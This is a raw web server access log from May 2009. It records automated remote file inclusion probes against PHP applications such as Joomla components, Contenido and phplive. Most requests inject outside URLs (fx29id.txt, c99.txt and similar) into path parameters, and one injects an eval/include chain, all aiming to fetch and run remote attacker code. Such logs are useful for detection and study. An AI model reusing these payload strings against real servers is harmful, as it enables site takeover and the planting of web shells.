222.231.1.87 - - [30/May/2009:02:12:28 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.231.1.87 - - [30/May/2009:02:12:28 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.1.87 - - [30/May/2009:02:13:18 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
72.18.148.82 - - [30/May/2009:02:13:24 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:13:24 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:13:25 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:14:17 -0400] "GET /main.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:14:17 -0400] "GET /logs/main.php?pagina=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:15:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.107.3.73 - - [30/May/2009:02:15:24 -0400] "GET /index2.php?option=com_custompages&cpage=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.107.3.73 - - [30/May/2009:02:15:24 -0400] "GET /logs/access_log.Q109052300/index2.php?option=com_custompages&cpage=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.107.3.73 - - [30/May/2009:02:15:29 -0400] "GET /logs/index2.php?option=com_custompages&cpage=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
200.107.3.73 - - [30/May/2009:02:15:35 -0400] "GET /logs/access_log.Q109051100/index2.php?option=com_custompages&cpage=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
64.182.124.1 - - [30/May/2009:02:16:13 -0400] "GET //accounts/inc/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 222 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:16:14 -0400] "GET /logs//accounts/inc/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:16:26 -0400] "GET /logs/access_log.Q109051500/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.236.47.188 - - [30/May/2009:02:16:52 -0400] "GET /include/lib.inc.php?site_path=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.65"
72.18.148.82 - - [30/May/2009:02:16:54 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:17:40 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:17:40 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:17:40 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:18:58 -0400] "GET //accounts/inc/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 222 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:18:58 -0400] "GET /logs//accounts/inc/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:20:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [30/May/2009:02:20:55 -0400] "GET /logs/main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:20:55 -0400] "GET /logs/error_log.Q108100300%20%20/main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:20:55 -0400] "GET /main.php?pagina=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:21:00 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:21:00 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:21:00 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:02:21:40 -0400] "GET /images/over-index12_drills.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
64.182.124.1 - - [30/May/2009:02:22:40 -0400] "GET //accounts/inc/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 222 "-" "Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:22:40 -0400] "GET /logs//accounts/inc/errors.php?error=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:25:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [30/May/2009:02:26:48 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:26:51 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:02:26:54 -0400] "GET /logs/access_log.Q109052300//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:28:23 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:28:23 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:28:23 -0400] "GET /logs/access_log.Q109051600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:28:23 -0400] "GET /logs/access_log.Q109051800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:28:37 -0400] "GET /logs/access_log.Q109051000/index.php?conteudo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:30:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [30/May/2009:02:33:03 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:33:58 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:33:58 -0400] "GET /logs/access_log.Q109051800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:33:59 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:02:34:07 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:02:34:07 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:02:34:09 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
218.27.203.107 - - [30/May/2009:02:34:21 -0400] "GET /logs/access_log.Q108081500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:02:34:22 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:02:34:23 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
85.17.162.28 - - [30/May/2009:02:34:32 -0400] "GET /logs/access_log.Q108081500//doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:34:32 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:34:32 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
61.81.93.142 - - [30/May/2009:02:34:43 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:02:34:43 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.81.93.142 - - [30/May/2009:02:34:45 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:34:51 -0400] "GET /logs/access_log.Q108081500//doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:34:51 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:34:51 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/May/2009:02:35:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [30/May/2009:02:36:11 -0400] "GET /logs/access_log.Q109010700//doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:36:42 -0400] "GET /logs/access_log.Q109010700//doceboCms/class/class.dashboard_cms.php?where_framework=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
189.14.202.124 - - [30/May/2009:02:36:46 -0400] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
189.14.202.124 - - [30/May/2009:02:36:56 -0400] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
222.236.47.188 - - [30/May/2009:02:38:30 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
222.236.47.188 - - [30/May/2009:02:38:31 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
222.236.47.188 - - [30/May/2009:02:38:31 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://w7ed.by.ru/c99.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
89.234.63.110 - - [30/May/2009:02:38:48 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:02:38:49 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:02:38:49 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:02:39:08 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:02:39:08 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:02:39:08 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:40:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.79.146 - - [30/May/2009:02:41:49 -0400] "GET /http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
174.133.241.18 - - [30/May/2009:02:42:00 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.814"
174.133.241.18 - - [30/May/2009:02:42:00 -0400] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.814"
174.133.241.18 - - [30/May/2009:02:42:01 -0400] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.814"
218.150.79.146 - - [30/May/2009:02:42:12 -0400] "GET /http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
174.133.241.18 - - [30/May/2009:02:43:13 -0400] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.814"
209.59.12.99 - - [30/May/2009:02:45:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.45.190.166 - - [30/May/2009:02:45:30 -0400] "GET /administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.45.190.166 - - [30/May/2009:02:45:30 -0400] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.45.190.166 - - [30/May/2009:02:45:30 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_jreactions/langset.php?comPath=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.150.79.146 - - [30/May/2009:02:46:21 -0400] "GET /logs/error_log.Q108100300/http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
218.150.79.146 - - [30/May/2009:02:46:21 -0400] "GET /http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
218.150.79.146 - - [30/May/2009:02:46:22 -0400] "GET /logs/http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
72.18.148.82 - - [30/May/2009:02:46:48 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:46:48 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:46:48 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:46:48 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:46:49 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:46:49 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:46:49 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:46:49 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:46:49 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:46:52 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:47:29 -0400] "GET /logs/access_log.Q109050700//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:47:31 -0400] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:47:31 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
218.150.78.203 - - [30/May/2009:02:48:15 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
218.150.78.203 - - [30/May/2009:02:48:15 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
218.150.78.203 - - [30/May/2009:02:48:15 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
72.18.148.82 - - [30/May/2009:02:48:19 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:48:19 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.150.79.146 - - [30/May/2009:02:48:24 -0400] "GET /logs/access_log.Q109021500/http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
218.150.79.146 - - [30/May/2009:02:48:24 -0400] "GET /http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
218.150.79.146 - - [30/May/2009:02:48:25 -0400] "GET /logs/http://www2.technicchan.ac.th/~comb/templates/athena/idx? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:48:26 -0400] "GET /logs/access_log.Q109051500//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
85.17.162.28 - - [30/May/2009:02:48:41 -0400] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:48:43 -0400] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.0.73.2 - - [30/May/2009:02:48:57 -0400] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
124.0.73.2 - - [30/May/2009:02:48:57 -0400] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
218.150.78.203 - - [30/May/2009:02:49:01 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
218.150.78.203 - - [30/May/2009:02:49:04 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
218.150.78.203 - - [30/May/2009:02:49:04 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
85.17.162.28 - - [30/May/2009:02:49:18 -0400] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:49:18 -0400] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.150.78.203 - - [30/May/2009:02:49:53 -0400] "GET /logs/access_log.Q107113000/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
